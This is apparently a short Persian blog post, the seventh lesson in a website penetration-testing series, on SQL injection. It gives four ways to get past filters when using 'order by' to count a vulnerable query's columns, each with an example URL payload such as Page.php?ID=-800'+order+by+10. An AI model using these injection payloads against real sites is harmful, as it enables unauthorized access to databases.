به نام خدا


جلسه هفتم

بعضی مواقع هست که به راختی نمی توان تعداد ستون های آسیب پیذیر را به دست آورد که برای اینکار باید آنرا بایپس یا به اصطلاح دور زد .

چند بایپس برای دستور order+by موجود می باشد :
 1 . استفاده از + در آخر دستور می باشد :+-- order+by+10

2.  استفاده از - در ابتدایی دستور می باشد :-- Page.php?ID=-800'+order+by+10

3. استفاده از and+1=0 قبل از دستور می باشد :-- Page.php?ID=800'+and+1=0+order+by+10

4. استفاده ترکیبی است :
+-- Page.php?ID=-800'+order+by+10

نوشته شده در تاریخ شنبه 17 بهمن 1394    | توسط: No Name    | طبقه بندی: امنیت و تست نفوذ در سایت،     |
نظرات()